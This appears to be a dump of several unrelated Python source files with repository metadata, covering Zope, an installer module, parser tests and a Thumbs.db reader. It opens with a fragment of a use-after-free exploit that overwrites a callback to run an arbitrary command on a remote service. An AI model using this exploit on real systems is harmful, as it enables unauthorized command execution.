print 'Usage: %s <ip> <command>' % sys.argv[0]
exit(0)
s = socket.create_connection((sys.argv[1], 0xb00b))
# cold breasts -> set global info variable
s.send('( ^ )( ^ )\n')
print s.recv(2048)
# lopsided breasts -> free global info variable
s.send('(o)(O)\n')
print s.recv(2048)
# wonder bra breasts -> allocate and write string (overwriting global info)
s.send('(oYo)\n')
print s.recv(2048)
x = struct.pack('I', 0x804857c) + sys.argv[2]
s.send('%s\x00%s\n' % (x, 'A' * (131 + len(x))))
# pornstar breasts -> execute callback
s.send('($)($)\n')
print s.recv(2048)
|
UTF-8
|
Python
| false | false | 2,012 |
6,648,609,407,770 |
1a17779aace160deaeafe7db33ed490f09ffa6a5
|
40bb2cdf828e574f254df9c47bdd7aaebe099ad7
|
/djcelery_transactions/models.py
|
ac90f7c868ead1232125bf01e12d77ffdfa1c235
|
[
"BSD-2-Clause-Views"
] |
permissive
|
spothero/django-celery-transactions
|
https://github.com/spothero/django-celery-transactions
|
1d2f850b9d6516932fffd58e75fffbc6adf7a40e
|
b83d1737426512fedfe1c50580ec08e524bdc677
|
refs/heads/master
| 2020-12-31T06:46:05.355710 | 2014-03-03T19:22:33 | 2014-03-03T19:22:33 | 17,300,914 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
from djcelery_transactions.transaction_signals import monkey_patch
monkey_patch()
|
UTF-8
|
Python
| false | false | 2,014 |
16,664,473,135,555 |
4162041459412affc467fe33a2ba46fe9fd1e408
|
ec662dad6d29c4e7ffc6cbecf9ace75654b9cfee
|
/mixremoteembed.py
|
e4b3715dd61dd37e2ed0c14edb862befc531b932
|
[
"GPL-2.0-only",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-generic-exception",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-other-copyleft"
] |
non_permissive
|
Immudzen/CompoundDoc
|
https://github.com/Immudzen/CompoundDoc
|
73038a5a5a02abd91c62d54e520cd5d7028494f0
|
639aa7b65923aaae3e8d7d656c7df3e0f3f7b7e8
|
refs/heads/master
| 2016-09-08T02:01:51.903059 | 2012-03-11T01:47:04 | 2012-03-11T01:47:04 | 1,162,589 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import base
import utility
#For Security control and init
from AccessControl import ClassSecurityInfo
import Globals
class MixRemoteEmbed:
"Base for all items that embed remote items"
meta_type = "MixRemoteEmbed"
security = ClassSecurityInfo()
modes = ('view', 'edit', 'config', 'debug')
security.declarePrivate('embedRemoteObject')
def embedRemoteObject(self, item, path, mode, view, profile, showid=1):
"return this item with this subpath mode and view"
if mode not in self.modes:
return ''
if profile:
if getattr(item,'profile',None) == profile:
return self.commonEmbedRemoteObject(item,path,mode,view, showid)
else:
return self.commonEmbedRemoteObject(item,path,mode,view, showid)
return ''
security.declarePrivate('commonEmbedRemoteObject')
def commonEmbedRemoteObject(self, item, path, mode, view, showid):
"common part of embedRemoteObject for profile and non profile mode"
formatid = '<p>%s</p>%s'
if path:
if path[0] == '/':
path = path[1:]
item = item.restrictedTraverse(path)
if utility.isinstance(item, base.Base):
if showid:
return formatid % (item.getCompoundDoc().getId(), item(mode=mode))
else:
return item(mode=mode)
elif utility.isinstance(item, base.Base):
self.setDrawMode(mode)
string = item.render(name=view, mode=mode)
if showid:
return formatid % (item.getId(), string)
else:
return string
return ''
Globals.InitializeClass(MixRemoteEmbed)
|
UTF-8
|
Python
| false | false | 2,012 |
15,693,810,538,689 |
19d372a7d3893688bacfc25985edcb116e4f9d2c
|
f1738cd603e0b2e31143f4ebf7eba403402aecd6
|
/ucs/base/univention-installer/installer/modules/35_dl.py.DISABLED
|
f4e19598a031d214be3f0df0ad982b12f869c6b9
|
[] |
no_license
|
m-narayan/smart
|
https://github.com/m-narayan/smart
|
92f42bf90d7d2b24f61915fac8abab70dd8282bc
|
1a6765deafd8679079b64dcc35f91933d37cf2dd
|
refs/heads/master
| 2016-08-05T17:29:30.847382 | 2013-01-04T04:50:26 | 2013-01-04T04:50:26 | 7,079,786 | 8 | 6 | null | false | 2015-04-29T08:54:12 | 2012-12-09T14:56:27 | 2015-02-22T10:34:03 | 2013-01-04T05:09:25 | 222,839 | 1 | 3 | 32 |
Python
| null | null |
#!/usr/bin/python2.6
# -*- coding: utf-8 -*-
#
# Univention Installer
# installer module: default system language
#
# Copyright 2004-2012 Univention GmbH
#
# http://www.univention.de/
#
# All rights reserved.
#
# The source code of this program is made available
# under the terms of the GNU Affero General Public License version 3
# (GNU AGPL V3) as published by the Free Software Foundation.
#
# Binary versions of this program provided by Univention to you as
# well as other copyrighted, protected or trademarked materials like
# Logos, graphics, fonts, specific documentations and configurations,
# cryptographic keys etc. are subject to a license agreement between
# you and Univention and not subject to the GNU AGPL V3.
#
# In the case you use this program under the terms of the GNU AGPL V3,
# the program is provided in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License with the Debian GNU/Linux or Univention distribution in file
# /usr/share/common-licenses/AGPL-3; if not, see
# <http://www.gnu.org/licenses/>.
#
# Results of previous modules are placed in self.all_results (dictionary)
# Results of this module need to be stored in the dictionary self.result (variablename:value[,value1,value2])
#
import objects, string, time
from objects import *
from local import _
class object(content):
def checkname(self):
return ['locale_default']
def profile_complete(self):
if self.check('locale_default'):
return False
if self.all_results.has_key('locale_default'):
return True
else:
if self.ignore('locale_default'):
return True
return False
def run_profiled(self):
if self.all_results.has_key('locale_default'):
return {'locale_default': self.all_results['locale_default']}
def __create_selection( self ):
default_value=''
self._locales=self.all_results['locales']
dict={}
if self.all_results.has_key('locale_default'):
default_value=self.all_results['locale_default']
elif hasattr( self, '_locale_default' ):
default_value = self._locale_default
count=0
default_line=0
for i in self._locales.split(" "):
dict[i]=[i, count]
if i == default_value:
default_line = count
count=count+1
self.elements.append(radiobutton(dict,self.minY,self.minX+2,33,10, [default_line])) #3
self.elements[3].current=default_line
def draw( self ):
if hasattr( self, '_locales' ):
self._locale_default = self.elements[ 3 ].result()
del self.elements[ 3 ]
self.__create_selection()
content.draw( self )
def layout(self):
self.elements.append(textline(_('Select your default system language:'),self.minY-1,self.minX+2)) #2
self.__create_selection()
def input(self,key):
if key in [ 10, 32 ] and self.btn_next():
return 'next'
elif key in [ 10, 32 ] and self.btn_back():
return 'prev'
else:
return self.elements[self.current].key_event(key)
def incomplete(self):
if string.join(self.elements[3].result(), ' ').strip(' ') == '':
return _('Please select the default system language')
return 0
def helptext(self):
return _('Default language \n \n Select a default system language.')
def modheader(self):
return _('Default language')
def result(self):
result={}
result['locale_default']=self.elements[3].result()
return result
|
UTF-8
|
Python
| false | false | 2,013 |
3,753,801,424,749 |
ecafbfe67764dd2c1ba93f6037ac92a8e84039c3
|
5bda5599b899e247dd8e4180390a898abc7ebb51
|
/scripts/affected_code/tests/ny-tests.py
|
587f15c636b6dd31506435aec0d4c95cee6cf162
|
[
"GPL-3.0-only"
] |
non_permissive
|
JoeGermuska/openstates
|
https://github.com/JoeGermuska/openstates
|
81ad79cf683c8237d7a1f98c1c57d0d3001479b2
|
d1a7b13fe9dfbc91df2bcf52a0256dd9f2aa5621
|
refs/heads/master
| 2021-01-18T10:19:50.766209 | 2013-03-08T23:09:40 | 2013-03-08T23:09:40 | 525,202 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import unittest
import pprint
from ny import Lexer, Parser, ParserState
from utils import parse
class TestRelatedCitation(unittest.TestCase):
maxDiff = None
def test_parse_all(self):
for string, data in samples:
_data = parse(Lexer, Parser, ParserState, string)
import pdb;pdb.set_trace()
# pprint.pprint(data)
# pprint.pprint(_data)
#self.assertEqual(data, _data)
samples = [
('Section 32 of the labor law is amended to read as follows:',
{
'type': 'statute',
'id': 'labor law',
'paths': [
[{'type': 'section', 'id': '32'}]
],
'impact': 'amended'
}
),
(('Section 191-b of the labor law, as added by chapter 451 of '
'the laws of 1987, is amended to read as follows:'),
{
'type': 'statute',
'id': 'labor law',
'paths': [
[{'type': 'section', 'id': '191-b'}]
],
'impact': 'amended'
}
),
(('Subdivision 1 of section 100 of the labor law, as amended '
'by chapter 757 of the laws of 1975, is amended to read as follows:'),
{
'type': 'statute',
'id': 'labor law',
'paths': [
[{'type': 'subdivision', 'id': '1'},
{'type': 'section', 'id': '100'}]
],
'impact': 'amended'
}
),
(('Subdivision 1 of section 21 of the labor law, added by section '
'146 of part B of chapter 436 of the laws of 1997 and renumbered by '
'chapter 214 of the laws of 1998, is amended to read as follows:'),
{
'type': 'statute',
'id': 'labor law',
'paths': [
[{'type': 'subdivision', 'id': '1'},
{'type': 'section', 'id': '21'}]
],
'impact': 'amended'
}
),
(('Section 57-0131 of the environmental conservation law, as amended '
'by chapter 286 of the laws of 1998, is amended to read as follows:'),
{
'type': 'statute',
'id': 'environmental conservation law',
'paths': [[{'type': 'section', 'id': '57-0131'}]],
'impact': 'amended'
}
),
(('Subdivision 4 of section 30 of the labor law, as amended by '
'chapter 756 of the laws of 1975 and renumbered by chapter 162 '
'of the laws of 1993, is amended to read as follows:'),
{
'id': 'labor law',
'type': 'statute',
'paths': [
[{'type': 'subdivision', 'id': '4'},
{'type': 'section', 'id': '30'}]
],
'impact': 'amended'
}
),
('Section 30 of the labor law is renumbered section 60.',
{
'id': 'labor law',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '30'}]
],
'impact': 'renumbered',
'details': [
[{'type': 'section', 'id': '60'}]
]
}
),
(('Subdivision 1 of section 20 of chapter 784 of the laws of 1951, '
'constituting the New York state defense emergency act, is '
'amended to read as follows:'),
{
'act_name': 'New York state defense emergency act',
'impact': 'amended',
'paths': [
[{'id': '1', 'type': 'subdivision'},
{'id': '20', 'type': 'section'},
{'id': '784', 'type': 'chapter'}]
],
'type': 'session_law',
'year': '1951'}
),
(('Subdivision 1 of section 20 of chapter 784 of the laws of '
'1951, constituting the New York state defense emergency act, '
'as amended by chapter 3 of the laws of 1961, is amended to '
'read as follows:'),
{
'year': '1951',
'type': 'session_law',
'paths': [
[{'type': 'subdivision', 'id': '1'},
{'type': 'section', 'id': '20'},
{'id': '784', 'type': 'chapter'}],
],
'act_name': 'New York state defense emergency act',
'impact': 'amended',
}
),
(('Section 4 of chapter 694 of the laws of 1962, relating to the '
'transfer of judges to the civil court of the city of New York, '
'is amended to read as follows:'),
{
'year': '1962',
'type': 'session_law',
'paths': [
[{'type': 'section', 'id': '4'},
{'type': 'chapter', 'id': '694'}],
],
'impact': 'amended',
}
),
(('Section 4502 of the public health law, as added by a chapter '
'of the laws of 1989, amending the public health law relating '
'to health foods, as proposed in legislative bill number S. '
'3601, is amended to read as follows:'),
{
'id': 'public health law',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '4502'}]
],
'impact': 'amended',
}
),
(('Section 4508 of the public health law, as added by a chapter '
'of the laws of 1989, amending the public health law relating '
'to health foods, as proposed in legislative bill number S. 3601, '
'is amended to read as follows:'),
{
'id': 'public health law',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '4508'}]
],
'impact': 'amended',
}
),
(('Section 3 of a chapter 234 of the laws of 1989, amending the public '
'health law relating to the sale of health foods, as proposed in '
'legislative bill number A. 5730, is amended to read as follows:'),
{
'year': '1989',
'type': 'session_law',
'paths': [
[{'type': 'section', 'id': '3'},
{'type': 'chapter', 'id': '234'}]
],
'impact': 'amended',
}
),
(('Section 4 of a chapter 234 of the laws of 1989, amended the public '
'health law relating to the sale of health foods, as proposed in '
'legislative bill number A. 5730, is amended to read as follows:'),
{
'year': '1989',
'type': 'session_law',
'paths': [
[{'type': 'section', 'id': '4'},
{'type': 'chapter', 'id': '234'}]
],
'impact': 'amended',
}
),
(('Section 401 of the education law, as amended by a chapter of '
'the laws of 1989, entitled "AN ACT to amend the civil rights '
'law, the education law, the executive law and the general '
'municipal law, in relation to prohibiting discrimination in '
'employment of physically handicapped persons, making certain '
'confirming amendments therein and making an appropriation '
'therefor", is amended to read as follows:'),
{
'id': 'education law',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '401'}]
],
'impact': 'amended',
}
),
(('Sections 16-a and 18-a of the general construction law, as added '
'by chapter 917 of the laws of 1920, are amended to read as follows:'),
{
'id': 'general construction law',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '16-a'}],
[{'type': 'section', 'id': '18-a'}]
],
'impact': 'amended',
}
),
#
(('Section 631 of the tax law, as amended by chapter 28 of the laws '
'of 1987, subsection (a) as amended by chapter 170 of the laws of '
'1994, subparagraph (c) of paragraph 1 of subsection (b) and '
'paragraph 2 of subsection (b) as amended, subparagraph (D) of '
'paragraph 1 of subsection (b) as added by chapter 586 of the laws '
'of 1999, and paragraph 4 of subsection (b) as amended by chapter '
'760 of the laws of 1992, is amended to read as follows:'),
{
'id': 'tax law',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '631'}],
],
'impact': 'amended',
}
),
(('Paragraphs (d) and (f) of section 1513-a of the not-for-profit '
'corporation law, as added by chapter 478 of the laws of 2003, are '
'amended and four new paragraphs (i), (j), (k) and (l) are added to '
'read as follows:'),
{
'id': 'not-for-profit corporation law',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '1513-a'},
{'type': 'paragraph', 'id': '(d)'}],
[{'type': 'section', 'id': '1513-a'},
{'type': 'paragraph', 'id': '(f)'}],
],
'impact': 'amended',
'details': [
[{'type': 'section', 'id': '1513-a'},
{'type': 'paragraph', 'id': '(i)'}],
[{'type': 'section', 'id': '1513-a'},
{'type': 'paragraph', 'id': '(j)'}],
[{'type': 'section', 'id': '1513-a'},
{'type': 'paragraph', 'id': '(k)'}],
[{'type': 'section', 'id': '1513-a'},
{'type': 'paragraph', 'id': '(l)'}],
],
}
),
# Aaaaaaand then there are these two monsters. Let's not worry about them...
(('Section 27-1018 of the administrative code of the city of New '
'York, subdivisions c, d and e as added by local law number 61 of '
'the city of New York for the year 1987, is amended to read as '
'follows:'),
{
'id': 'administrative code of the city of New York',
'type': 'statute',
'paths': [
[{'type': 'section', 'id': '27-1018'}],
],
'impact': 'amended'
}
),
(('Paragraph 2, subparagraph (A) of paragraph 4, and paragraph 6 of '
'subsection (b) of section 92-85 of the codes and ordinances of the '
'city of Yonkers, paragraph 2 and subparagraph (A) of paragraph 4 '
'as added by local law number 8 and paragraph 6 as amended by local '
'law number 9 of the city of Yonkers for the year 1984, are amended '
'to read as follows:'),
{
'type': 'statute',
'id': 'codes and ordinances of the city of Yonkers',
'paths': [[{'type': 'paragraph', 'id': '2'},
{'type': 'subparagraph', 'id': 'A'},
{'type': 'paragraph', 'id': '4'},
{'type': 'subsection', 'id': 'b'},
{'type': 'section', 'id': '92-85'}],
[{'type': 'paragraph', 'id': '6'},
{'type': 'subsection', 'id': 'b'},
{'type': 'section', 'id': '92-85'}]
],
'impact': 'amended'
}
)
]
if __name__ == '__main__':
unittest.main()
|
UTF-8
|
Python
| false | false | 2,013 |
4,432,406,265,198 |
470ea4d073704b7e0c9c8aecb05391db74fe8e6a
|
e48671fa1593b3a5f8682fc99d684c158c465aae
|
/problem-13/problem-13.py
|
b6db29a563507d85fbb777379400a8e40cd34714
|
[] |
no_license
|
pkakelas/project-euler
|
https://github.com/pkakelas/project-euler
|
294e399cd83412946936cf0416aa9c03eb17a585
|
7b4909f26757bffb8c87d7f3cf9e375cb97b1813
|
refs/heads/master
| 2020-04-04T06:36:29.371744 | 2014-08-19T12:07:04 | 2014-08-19T12:07:04 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
file = open('problem-13/problem-13.in', 'r')
nums = []
for line in file:
line = line.replace('\n', '')
nums.append(int(line))
sum = 0
for num in nums:
sum += num
print str(sum)[0:10]
|
UTF-8
|
Python
| false | false | 2,014 |
14,070,312,884,537 |
a7cd2370c3e65770213cdccbb9e468e794fae24f
|
ea567534f56d940bd117960d5d8e1f43e2919181
|
/unittests/tests/win/shell/thumbsdb/objects.py
|
5baf6ef5e41904d986693f44eacbbe3efd25c1af
|
[
"LGPL-3.0-only",
"GPL-3.0-only"
] |
non_permissive
|
bytekve/libforensics
|
https://github.com/bytekve/libforensics
|
2208a9987ca52a027d2ff8749ccfe8892031100f
|
629912767c76345e75b3f53b1d42c7a4f03ac09c
|
refs/heads/master
| 2021-01-02T09:15:44.109008 | 2010-04-21T08:33:16 | 2010-04-21T08:33:16 | 32,693,268 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Copyright 2010 Michael Murr
#
# This file is part of LibForensics.
#
# LibForensics is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# LibForensics is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with LibForensics. If not, see <http://www.gnu.org/licenses/>.
"""Unit tests for the lf.win.shell.thumbsdb.objects module."""
# stdlib imports
from unittest import TestCase
from os.path import join
from datetime import datetime
from hashlib import md5
# local imports
from lf.dec import RawIStream, ByteIStream, SEEK_SET
from lf.time import FILETIMETodatetime
from lf.win.ole.cfb import CompoundFile
from lf.win.shell.thumbsdb.objects import (
CatalogEntry, Catalog, Thumbnail, ThumbsDb
)
__docformat__ = "restructuredtext en"
__all__ = [
"CatalogEntryTestCase", "CatalogTestCase", "ThumbnailTestCase",
"ThumbsDbTestCase"
]
class CatalogEntryTestCase(TestCase):
def test_from_stream(self):
ae = self.assertEqual
data = bytearray()
data.extend(b"\x3E\x00\x00\x00") # size
data.extend(b"\x01\x00\x00\x00") # id/index
data.extend(b"\x00\x68\x67\x4F\xB7\xA3\xCA\x01") # mtime
data.extend(b"d\x00a\x00n\x00g\x00e\x00r\x00-\x00s\x00i\x00") # name
data.extend(b"g\x00n\x00-\x00s\x00h\x00o\x00c\x00k\x00") # more name
data.extend(b".\x00j\x00p\x00g\x00\x00\x00") # more name
stream = ByteIStream(data)
ce0 = CatalogEntry.from_stream(stream)
ce1 = CatalogEntry.from_stream(stream, 0)
for ce in (ce0, ce1):
ae(ce.size, 0x3E)
ae(ce.id, 1)
ae(ce.stream_name, "1")
ae(ce.mtime, datetime(2010, 2, 2, 3, 25, 4))
# end for
# end def test_from_stream
# end def CatalogEntryTestCase
class CatalogTestCase(TestCase):
def test_from_stream(self):
ae = self.assertEqual
data = bytearray()
# catalog header
data.extend(b"\x10\x00\x07\x00") # unknown 1 and 2
data.extend(b"\x02\x00\x00\x00") # item_count
data.extend(b"\x00\x01\x02\x03") # width
data.extend(b"\x04\x05\x06\x07") # height
# first entry
data.extend(b"\x2E\x00\x00\x00") # size
data.extend(b"\x01\x00\x00\x00") # id/index
data.extend(b"\x95\x98\x50\xB7\xA3\xCA\x01") # mtime
data.extend(b"z\x00o\x00o\x00l\x00e\x00m\x00u\x00r\x00") # name
data.extend(b"1\x00.\x00j\x00p\x00g\x00\x00") # more name
# second entry
data.extend(b"\x3E\x00\x00\x00") # size
data.extend(b"\x02\x00\x00\x00") # id/index
data.extend(b"\x00\x68\x67\x4F\xB7\xA3\xCA\x01") # mtime
data.extend(b"d\x00a\x00n\x00g\x00e\x00r\x00-\x00s\x00i\x00") # name
data.extend(b"g\x00n\x00-\x00s\x00h\x00o\x00c\x00k\x00") # more name
data.extend(b".\x00j\x00p\x00g\x00\x00\x00") # more name
stream = ByteIStream(data)
cat0 = Catalog.from_stream(stream)
cat1 = Catalog.from_stream(stream, 0)
entries = [
CatalogEntry.from_stream(stream, 16),
CatalogEntry.from_stream(stream, 62)
]
for cat in (cat0, cat1):
ae(cat.width, 0x03020100)
ae(cat.height, 0x07060504)
ae(cat.item_count, 2)
ae(cat.entries, entries)
# end for
# end def test_from_stream
# end class CatalogTestCase
class ThumbnailTestCase(TestCase):
def test_from_stream(self):
ae = self.assertEqual
data = bytearray()
data.extend(b"\x00\x01\x02\x03") # unknown1
data.extend(b"\x04\x05\x06\x07") # unknown2
data.extend(b"\x05\x00\x00\x00") # size
data.extend(b"\xFF\xD8\x08\x09\x0A") # data
stream = ByteIStream(data)
thumb1 = Thumbnail.from_stream(stream)
thumb2 = Thumbnail.from_stream(stream, 0)
for thumb in (thumb1, thumb2):
ae(thumb.size, 0x5)
ae(thumb.data, b"\xFF\xD8\x08\x09\x0A")
# end for
data = bytearray()
data.extend(b"\x00\x01\x02\x03") # unknown1
data.extend(b"\x05\x00\x00\x00") # size
data.extend(b"\x04\x05\x06\x07") # unknown2
data.extend(b"\x08\x09\x0A\x0B") # unknown3
data.extend(b"\xFF\xD8\x0C\x0D\x0E") # data
stream = ByteIStream(data)
thumb1 = Thumbnail.from_stream(stream)
thumb2 = Thumbnail.from_stream(stream, 0)
for thumb in (thumb1, thumb2):
ae(thumb.size, 0x5)
ae(thumb.data, b"\xFF\xD8\x0C\x0D\x0E")
# end for
# end def test_from_stream
# end class ThumbnailTestCase
class ThumbsDbTestCase(TestCase):
def setUp(self):
input_file = join("data", "thumbsdb", "thumbs.db")
self.cfb = CompoundFile(RawIStream(input_file))
self.tdb = ThumbsDb(self.cfb)
# end def setUp
def test__init__(self):
ae = self.assertEqual
ar = self.assertRaises
tdb = self.tdb
catalog_entries = [
CatalogEntry((
0x2E,
1,
FILETIMETodatetime.from_int(0x01CAA3B750989500),
"zoolemur1.jpg",
"1"
)),
CatalogEntry((
0x56,
2,
FILETIMETodatetime.from_int(0x01CAA3B74F676800),
"Copy (2) of danger-sign-shock.jpg",
"2"
)),
CatalogEntry((
0x5E,
3,
FILETIMETodatetime.from_int(0x01CAA3B74E363B00),
"Copy (2) of Kookaburra_at_Marwell.jpg",
"3"
)),
CatalogEntry((
0x54,
4,
FILETIMETodatetime.from_int(0x01CAA3B74F676800),
"Copy (2) of Makari_the_Tiger.jpg",
"4"
)),
CatalogEntry((
0x4A,
5,
FILETIMETodatetime.from_int(0x01CAA3B750989500),
"Copy (2) of prairiedogs.jpg",
"5"
)),
CatalogEntry((
0x46,
6,
FILETIMETodatetime.from_int(0x01CAA3B750989500),
"Copy (2) of zoolemur1.jpg",
"6"
)),
CatalogEntry((
0x4E,
7,
FILETIMETodatetime.from_int(0x01CAA3B74F676800),
"Copy of danger-sign-shock.jpg",
"7"
)),
CatalogEntry((
0x56,
8,
FILETIMETodatetime.from_int(0x01CAA3B74E363B00),
"Copy of Kookaburra_at_Marwell.jpg",
"8"
)),
CatalogEntry((
0x4C,
9,
FILETIMETodatetime.from_int(0x01CAA3B74F676800),
"Copy of Makari_the_Tiger.jpg",
"9"
)),
CatalogEntry((
0x42,
10,
FILETIMETodatetime.from_int(0x01CAA3B750989500),
"Copy of prairiedogs.jpg",
"01"
)),
CatalogEntry((
0x3E,
11,
FILETIMETodatetime.from_int(0x01CAA3B750989500),
"Copy of zoolemur1.jpg",
"11"
)),
CatalogEntry((
0x3E,
12,
FILETIMETodatetime.from_int(0x01CAA3B74F676800),
"danger-sign-shock.jpg",
"21"
)),
CatalogEntry((
0x46,
13,
FILETIMETodatetime.from_int(0x01CAA3B74E363B00),
"Kookaburra_at_Marwell.jpg",
"31"
)),
CatalogEntry((
0x3C,
14,
FILETIMETodatetime.from_int(0x01CAA3B74F676800),
"Makari_the_Tiger.jpg",
"41"
)),
CatalogEntry((
0x32,
15,
FILETIMETodatetime.from_int(0x01CAA3B750989500),
"prairiedogs.jpg",
"51"
)),
]
catalog = Catalog((96, 96, 15, catalog_entries))
md5_hashes = {
8: "41783146a36b0df9c0e450715439fa55",
4: "8524c25aab60e2a76ecb3fd1215c52fa",
2: "ca70cbc23a7e39fbeba90f027fef6e5c",
1: "925405772966a6c3bbcedec92c2cb29a",
3: "41783146a36b0df9c0e450715439fa55",
6: "925405772966a6c3bbcedec92c2cb29a",
5: "6bbeb0387e4f44aac21d582a1f2a467d",
7: "ca70cbc23a7e39fbeba90f027fef6e5c",
12: "ca70cbc23a7e39fbeba90f027fef6e5c",
10: "6bbeb0387e4f44aac21d582a1f2a467d",
9: "8524c25aab60e2a76ecb3fd1215c52fa",
11: "925405772966a6c3bbcedec92c2cb29a",
14: "8524c25aab60e2a76ecb3fd1215c52fa",
13: "41783146a36b0df9c0e450715439fa55",
15: "6bbeb0387e4f44aac21d582a1f2a467d"
}
ae(tdb.catalog, catalog)
ae(tdb.thumbnails.keys(), md5_hashes.keys())
for (key, hash) in md5_hashes.items():
ae(md5(tdb.thumbnails[key].data).hexdigest(), hash)
# end for
ar(
KeyError,
ThumbsDb, self.cfb,"thisisnotthecatalogyouarelookingfor"
)
# end def test__init__
# end class ThumbsDbTestCase
|
UTF-8
|
Python
| false | false | 2,010 |
3,006,477,112,975 |
68bc718c9916d668020d8cf25f5a39f01d5073a0
|
153ecce57c94724d2fb16712c216fb15adef0bc4
|
/zope.app.dav/branches/3.5/src/zope/app/dav/propfind.py
|
cecfa87bc6218aeef267e1e0c061b78aab9e1f99
|
[
"ZPL-2.1"
] |
permissive
|
pombredanne/zope
|
https://github.com/pombredanne/zope
|
10572830ba01cbfbad08b4e31451acc9c0653b39
|
c53f5dc4321d5a392ede428ed8d4ecf090aab8d2
|
refs/heads/master
| 2018-03-12T10:53:50.618672 | 2012-11-20T21:47:22 | 2012-11-20T21:47:22 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
##############################################################################
# Copyright (c) 2003 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
##############################################################################
"""WebDAV method PROPFIND
$Id$
"""
__docformat__ = 'restructuredtext'
from xml.dom import minidom
from xml.parsers import expat
from zope.component import getUtilitiesFor, queryMultiAdapter, queryUtility
from zope.schema import getFieldNamesInOrder, getFields
from zope.container.interfaces import IReadContainer
from zope.app.form.utility import setUpWidgets
from zope.security import proxy
from zope.traversing.browser.absoluteurl import absoluteURL
from interfaces import IDAVWidget, IDAVNamespace
from opaquenamespaces import IDAVOpaqueNamespaces
class PROPFIND(object):
"""PROPFIND handler for all objects"""
def __init__(self, context, request):
self.context = context
self.request = request
self.setDepth(request.getHeader('depth', 'infinity'))
ct = request.getHeader('content-type', 'text/xml')
if ';' in ct:
parts = ct.split(';', 1)
self.content_type = parts[0].strip().lower()
self.content_type_params = parts[1].strip()
else:
self.content_type = ct.lower()
self.content_type_params = None
self.default_ns = 'DAV:'
self.oprops = IDAVOpaqueNamespaces(self.context, None)
_avail_props = {}
# List all *registered* DAV interface namespaces and their properties
for ns, iface in getUtilitiesFor(IDAVNamespace):
_avail_props[ns] = getFieldNamesInOrder(iface)
# List all opaque DAV namespaces and the properties we know of
if self.oprops:
for ns, oprops in self.oprops.items():
_avail_props[ns] = list(oprops.keys())
self.avail_props = _avail_props
# The xmldoc attribute will be set later, if needed.
self.xmldoc = None
def getDepth(self):
return self._depth
def setDepth(self, depth):
self._depth = depth.lower()
def PROPFIND(self, xmldoc=None):
if self.content_type not in ['text/xml', 'application/xml']:
self.request.response.setStatus(400)
return ''
if self.getDepth() not in ['0', '1', 'infinity']:
self.request.response.setStatus(400)
return ''
resource_url = absoluteURL(self.context, self.request)
if IReadContainer.providedBy(self.context):
resource_url += '/'
if xmldoc is None:
try:
xmldoc = minidom.parse(self.request.bodyStream)
except expat.ExpatError:
pass
self.xmldoc = xmldoc
resp = minidom.Document()
ms = resp.createElement('multistatus')
ms.setAttribute('xmlns', self.default_ns)
resp.appendChild(ms)
ms.appendChild(resp.createElement('response'))
ms.lastChild.appendChild(resp.createElement('href'))
ms.lastChild.lastChild.appendChild(resp.createTextNode(resource_url))
if xmldoc is not None:
propname = xmldoc.getElementsByTagNameNS(
self.default_ns, 'propname')
if propname:
self._handlePropname(resp)
else:
source = xmldoc.getElementsByTagNameNS(self.default_ns, 'prop')
self._handlePropvalues(source, resp)
else:
self._handlePropvalues(None, resp)
self._depthRecurse(ms)
body = resp.toxml('utf-8')
self.request.response.setResult(body)
self.request.response.setStatus(207)
self.request.response.setHeader('content-type', 'text/xml')
return body
def _depthRecurse(self, ms):
depth = self.getDepth()
if depth == '0' or not IReadContainer.providedBy(self.context):
return
subdepth = (depth == '1') and '0' or 'infinity'
for id, obj in self.context.items():
pfind = queryMultiAdapter((obj, self.request), name='PROPFIND')
if pfind is None:
continue
pfind.setDepth(subdepth)
value = pfind.PROPFIND(self.xmldoc)
parsed = minidom.parseString(value)
responses = parsed.getElementsByTagNameNS(
self.default_ns, 'response')
for r in responses:
ms.appendChild(ms.ownerDocument.importNode(r, True))
def _handleProp(self, source):
props = {}
source = source[0]
childs = [e for e in source.childNodes
if e.nodeType == e.ELEMENT_NODE]
for node in childs:
ns = node.namespaceURI
iface = queryUtility(IDAVNamespace, ns)
value = props.get(ns, {'iface': iface, 'props': []})
value['props'].append(node.localName)
props[ns] = value
return props
def _handleAllprop(self):
props = {}
for ns, properties in self.avail_props.items():
iface = queryUtility(IDAVNamespace, ns)
props[ns] = {'iface': iface, 'props': properties}
return props
def _handlePropname(self, resp):
re = resp.lastChild.lastChild
re.appendChild(resp.createElement('propstat'))
prop = resp.createElement('prop')
re.lastChild.appendChild(prop)
count = 0
